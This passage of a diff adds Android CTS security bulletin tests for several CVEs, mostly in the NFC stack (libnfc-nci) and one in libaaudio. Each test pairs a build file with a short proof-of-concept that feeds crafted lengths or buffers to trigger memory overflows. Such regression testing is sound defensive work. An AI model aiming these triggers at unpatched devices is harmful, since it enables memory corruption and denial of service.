+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ tLLCP_CONNECTION_PARAMS params;
+ llcp_util_parse_connect(&p_bytes[offset], LENGTH, ¶ms);
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp
new file mode 100644
index 0000000..933e770
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2018-9563",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp
new file mode 100644
index 0000000..e021114
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <llcp_api.h>
+
+#define DEFAULT_VALUE 0x02
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_STATUS llcp_util_parse_cc(uint8_t* p_bytes, uint16_t length,
+ uint16_t* p_miu, uint8_t* p_rw);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ tLLCP_CONNECTION_PARAMS params;
+ llcp_util_parse_cc(&p_bytes[offset], LENGTH, &(params.miu), &(params.rw));
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp
new file mode 100644
index 0000000..48285f6
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2018-9584",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp
new file mode 100644
index 0000000..94aa642
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+#include <nfc_int.h>
+
+#define LENGTH 16
+
+char enable_selective_overload = ENABLE_NONE;
+extern tNFC_CB nfc_cb;
+
+static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE *p_data) {
+ (void) event;
+ (void) p_data;
+}
+
+int main() {
+ nfc_cb.p_resp_cback = resp_cback;
+
+ enable_selective_overload = ENABLE_ALL;
+ uint8_t *p_msg = (uint8_t *)malloc(LENGTH);
+ if (!p_msg) {
+ return EXIT_FAILURE;
+ }
+
+ // Set evt_data.set_config.status
+ *p_msg = 0x03;
+ // Set evt_data.set_config.num_param_id
+ *(p_msg + 1) = 255;
+ nfc_ncif_set_config_status(p_msg, LENGTH);
+
+ free(p_msg);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp
new file mode 100644
index 0000000..3180ff2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2018-9585",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp
new file mode 100644
index 0000000..7227adf
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+#include <nfc_int.h>
+
+#define LENGTH 16
+
+char enable_selective_overload = ENABLE_NONE;
+extern tNFC_CB nfc_cb;
+
+static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE* p_data) {
+ (void) event;
+ (void) p_data;
+}
+
+int main() {
+ nfc_cb.p_resp_cback = resp_cback;
+
+ enable_selective_overload = ENABLE_ALL;
+ uint8_t *p_msg = (uint8_t *)malloc(LENGTH);
+ if (!p_msg) {
+ return EXIT_FAILURE;
+ }
+ memset(p_msg, 0x01, LENGTH);
+
+ // Set evt_data.tlv_size
+ *(p_msg + 5) = 200;
+ nfc_ncif_proc_get_routing(p_msg, LENGTH);
+
+ free(p_msg);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp
new file mode 100644
index 0000000..0411a88
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2007",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libaaudio_internal",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libaaudio/src",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp
new file mode 100644
index 0000000..7f8ebdb
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "fifo/FifoBuffer.h"
+#include "fifo/FifoController.h"
+#include <stdlib.h>
+
+#define CAPACITY 83
+#define THRESHOLD 47
+#define NUM_FRAMES -9999999999
+
+using android::FifoController;
+
+int main() {
+ FifoController fifoController(CAPACITY, THRESHOLD);
+ fifoController.advanceReadIndex((android::fifo_frames_t)NUM_FRAMES);
+ fifoController.advanceWriteIndex((android::fifo_frames_t)NUM_FRAMES);
+ int32_t readIndex = fifoController.getReadIndex();
+ int32_t writeIndex = fifoController.getWriteIndex();
+
+ if ((readIndex < 0) || (writeIndex < 0)) {
+ return EXIT_VULNERABLE;
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp
new file mode 100644
index 0000000..3d90f1f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2013",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp
new file mode 100644
index 0000000..23098ac
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp
@@ -0,0 +1,168 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <dlfcn.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#define T3T_MSG_FELICALITE_MC_OFFSET 0x01
+
+char enable_selective_overload = ENABLE_NONE;
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN],
+ uint8_t mrti_check, uint8_t mrti_update);
+
+static void (*real_GKI_freebuf)(void* ptr) = nullptr;
+void *kAllocatedPointers[2];
+int allocatedPointersIndex = -1;
+bool kIsInitialized = false;
+
+void init(void) {
+ real_GKI_freebuf = (void (*)(void*))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void GKI_freebuf(void* ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ if (ptr == kAllocatedPointers[0] || ptr == kAllocatedPointers[1]) {
+ return;
+ } else {
+ real_GKI_freebuf(ptr);
+ }
+}
+
+void *allocate_memory(size_t size) {
+ void *ptr = malloc(size);
+ memset(ptr, 0x0, size);
+ kAllocatedPointers[++allocatedPointersIndex] = ptr;
+ return ptr;
+}
+
+// borrowed from rw_i93.cc
+enum {
+ RW_T3T_CMD_DETECT_NDEF,
+ RW_T3T_CMD_CHECK_NDEF,
+ RW_T3T_CMD_UPDATE_NDEF,
+ RW_T3T_CMD_CHECK,
+ RW_T3T_CMD_UPDATE,
+ RW_T3T_CMD_SEND_RAW_FRAME,
+ RW_T3T_CMD_GET_SYSTEM_CODES,
+ RW_T3T_CMD_FORMAT,
+ RW_T3T_CMD_SET_READ_ONLY_SOFT,
+ RW_T3T_CMD_SET_READ_ONLY_HARD,
+
+ RW_T3T_CMD_MAX
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_T3T_STATE_NOT_ACTIVATED,
+ RW_T3T_STATE_IDLE,
+ RW_T3T_STATE_COMMAND_PENDING
+};
+
+// borrowed from rw_i93.cc
+enum {
+ /* Sub states for formatting Felica-Lite */
+ RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
+ formatting) */
+ RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-read to complete */
+ RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-write to complete */
+ RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
+ to complete */
+
+ /* Sub states for setting Felica-Lite read only */
+ RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
+ setting read only) */
+ RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
+ to complete */
+ RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-read to complete */
+ RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl)
+ block-write to complete */
+};
+
+void cback(uint8_t c __attribute__((unused)),
+ tRW_DATA* d __attribute__((unused))) {
+}
+
+int main() {
+
+ enable_selective_overload = ENABLE_ALL;
+ tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t peer_nfcid2[NCI_RF_F_UID_LEN];
+ uint8_t mrti_check = 1, mrti_update = 1;
+ if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN *p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+ p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+ p_data->status = NFC_STATUS_OK;
+
+ p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD;
+ p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
+ p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK;
+
+ NFC_HDR* p_msg = (p_data->data).p_data;
+ p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;
+
+ uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1);
+ p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
+ p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;
+
+ uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA];
+ p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET;
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ TIMER_LIST_ENT pFirst = { };
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ rw_cb.p_cback = &cback;
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp
new file mode 100644
index 0000000..603130e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2014",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp
new file mode 100644
index 0000000..26c607e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <rw_int.h>
+#include <stdlib.h>
+
+#include "../includes/common.h"
+
+// borrowed from rw_t3t.cc
+#define RW_T3T_SENSF_RES_RD_OFFSET 17
+#define RW_T3T_SENSF_RES_RD_LEN 2
+#define DEFAULT_VALUE 0xBE
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void cback(uint8_t, tRW_DATA *) {}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+int main() {
+ tRW_T3T_CB *p_cb = &rw_cb.tcb.t3t;
+
+ GKI_init();
+ rw_init();
+ rw_cb.p_cback = &cback;
+
+ for (int n = 0; n < NCI_NFCID2_LEN; ++n) {
+ p_cb->peer_nfcid2[n] = DEFAULT_VALUE;
+ }
+
+ p_cb->num_system_codes = T3T_MAX_SYSTEM_CODES;
+ p_cb->flags = RW_T3T_FL_W4_GET_SC_POLL_RSP;
+
+ uint8_t nci_status = NCI_STATUS_OK;
+ uint8_t num_responses = 1;
+ uint8_t sensf_res_buf_size =
+ RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN;
+ uint8_t *p_sensf_res_buf =
+ (uint8_t *)malloc(RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN);
+ rw_t3t_handle_nci_poll_ntf(nci_status, num_responses, sensf_res_buf_size,
+ p_sensf_res_buf);
+
+ free(p_sensf_res_buf);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp
new file mode 100644
index 0000000..f5bf632
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2019",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ include_dirs: [
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfc/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp
new file mode 100644
index 0000000..483b7c4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ce_int.h>
+#include <nfc_int.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#define OFFSET 8
+#define VULNERABLE_LENGTH 0
+
+char enable_selective_overload = ENABLE_NONE;
+
+extern tNFC_CB nfc_cb;
+extern tCE_CB ce_cb;
+
+void GKI_freebuf(void* p_buf __attribute__((unused))) {}
+
+void nfc_start_quick_timer(TIMER_LIST_ENT*, uint16_t, uint32_t) {}
+
+void nfc_stop_timer(TIMER_LIST_ENT*) {}
+
+void nfc_stop_quick_timer(TIMER_LIST_ENT*) {}
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ GKI_init();
+ ce_init();
+ ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED;
+
+ if (ce_select_t4t() != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
+ p_data->data.p_data = (NFC_HDR*)malloc(sizeof(uint8_t) * 16);
+ NFC_HDR* p_c_apdu = (NFC_HDR*)p_data->data.p_data;
+ p_c_apdu->len = VULNERABLE_LENGTH;
+ p_c_apdu->offset = OFFSET;
+ uint8_t conn_id = 1;
+ TIMER_LIST_ENT pFirst = {};
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp
new file mode 100644
index 0000000..18c960c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2019-2035",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp
new file mode 100644
index 0000000..23489ee
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/poc.cpp
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
